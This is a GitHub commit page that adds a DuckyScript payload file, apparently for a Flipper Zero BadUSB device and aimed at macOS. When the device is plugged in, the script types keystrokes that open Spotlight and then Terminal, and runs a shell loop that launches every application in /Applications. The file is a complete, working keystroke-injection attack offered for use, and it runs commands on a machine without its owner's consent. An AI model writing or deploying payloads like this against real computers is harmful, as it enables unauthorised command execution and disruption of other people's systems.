Skip to content

Commit

Permalink
Create payload.txt
Browse files Browse the repository at this point in the history
Signed-off-by: bst04 <[email protected]>
  • Loading branch information
bst04 authored Nov 21, 2024
1 parent 55121e3 commit 5af351a
Showing 1 changed file with 19 additions and 0 deletions.
19 changes: 19 additions & 0 deletions iOS/OpenAll-FlipZero/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
REM #############################
REM # #
REM # Title : OpenALL #
REM # Author : bst04 #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : OS MacOS #
REM # #
REM #############################


DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING for app in /Applications/*.app; do open "$app"; done
ENTER

0 comments on commit 5af351a

Please sign in to comment.